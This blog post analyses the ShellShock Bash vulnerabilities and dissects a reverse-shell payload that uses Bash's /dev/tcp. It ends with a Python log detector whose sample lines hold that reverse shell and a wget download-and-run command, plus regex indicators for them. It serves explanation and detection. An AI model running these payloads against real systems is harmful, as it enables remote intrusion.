A Bash vulnerability (aka ShellShock) was published two months ago (CVE-2014-6271, original release date 09/24/2014), reaching the highest score for Impact and Exploitability from NIST-NVD, with the following overview:
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
The first patch released was partial and introduced another vulnerability (CVE-2014-7169, original release date 09/24/2014), again with the top score for Impact and Exploitability from NIST-NVD, with the following overview (highlight is mine):
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271
Two months later, ShellShock is still in the wild, used to exploit thousands of systems all around the net, installing PHP/Perl/IRC shells or any other malicious payload. This is possible because the original ShellShock vulnerability is now related to five other CVEs:
- CVE-2014-6271 (Initial report)
- CVE-2014-6277
- CVE-2014-6278
- CVE-2014-7169
- CVE-2014-7186
- CVE-2014-7187
The following image, taken from the F5 website, explains how ShellShock works and why it is so dangerous:
Basically, by exploiting this vulnerability you can run any command (or any sequence of commands), but in 90% of the cases I found, the final goal was a shell installation, usually in five steps:
- Exploiting the vulnerability
- Downloading a script (Perl, Bash, C, etc.) from a remote site via wget, curl, etc.
- Saving the script under /tmp
- Executing the script
- Cleaning up (removing the original file from /tmp)
In many cases this approach fails, because Perl/PHP/C shells are detected and removed by the security safeguards protecting the system, and the remote sites can be blocked by web filtering policies. In recent days, however, I noticed a specific attack that does not download any malicious code, but uses only the system's own shell:
() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1
Let me explain in more detail:
() { ignored;}; is the ShellShock exploit (a function definition followed by a trailing command, which vulnerable Bash versions execute)
/bin/bash -i starts an interactive Bash session
>& /dev/tcp/ip/port redirects standard output and standard error to the remote host through Bash's /dev/tcp pseudo-device (e.g. /dev/tcp/1.2.3.4/8080 sends the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 ties standard input to the same connection. Strictly speaking this should be 0<&1, but it works in both cases
On the remote host a listener must be running; for testing I used nc -l 8080 (netcat listening on port 8080)
This is a very interesting approach to exploiting ShellShock to get a reverse shell 🙂
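From the defender's side, the useful property of every ShellShock probe is the "() {" prefix that Bash parses as a function definition, whatever trailing command follows it. The following detector, added here as an example that is not part of the original post, scans constructed Apache access-log lines for that prefix and then labels the trailing command with the indicators described above (the /dev/tcp reverse shell, or the download/stage-in-/tmp/execute/clean-up sequence). The log lines, IP addresses and URL are made up for the example.

```python
import re

# Constructed sample Apache access-log lines (combined format); not real traffic.
# Line 1: the reverse-shell payload discussed in the post, carried in the User-Agent.
# Line 2: the download-and-run variant described in the five steps.
# Line 3: a benign request that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Sep/2014:12:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" '
    '"() { ignored;};/bin/bash -i >& /dev/tcp/203.0.113.5/8080 0>&1"',
    '198.51.100.9 - - [24/Sep/2014:12:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" '
    '"() { :;}; /usr/bin/wget -O /tmp/x http://example.invalid/x; sh /tmp/x; rm /tmp/x"',
    '192.0.2.7 - - [24/Sep/2014:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

# Bash treats an exported variable whose value starts with "() {" as a function
# definition; that prefix is what every ShellShock probe must carry.
FUNC_DEF = re.compile(r"\(\)\s*\{")

# Secondary indicators describing what the trailing command tries to do.
INDICATORS = {
    "reverse_shell": re.compile(r"/dev/tcp/[0-9a-zA-Z.:-]+/\d+"),  # Bash /dev/tcp socket
    "download_tool": re.compile(r"\b(wget|curl)\b"),               # fetch a payload
    "tmp_stage": re.compile(r"/tmp/\S+"),                          # stage it under /tmp
    "cleanup": re.compile(r"\brm\s"),                              # remove the evidence
}


def classify(line):
    """Return None for a clean line, else the source IP and the matched indicators."""
    if not FUNC_DEF.search(line):
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
    return {"src": line.split(" ", 1)[0], "indicators": hits}


def scan(lines):
    """Run classify() over an iterable of log lines and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same check applies to any header a CGI server exports into the environment (Referer, Cookie, custom headers), not only User-Agent.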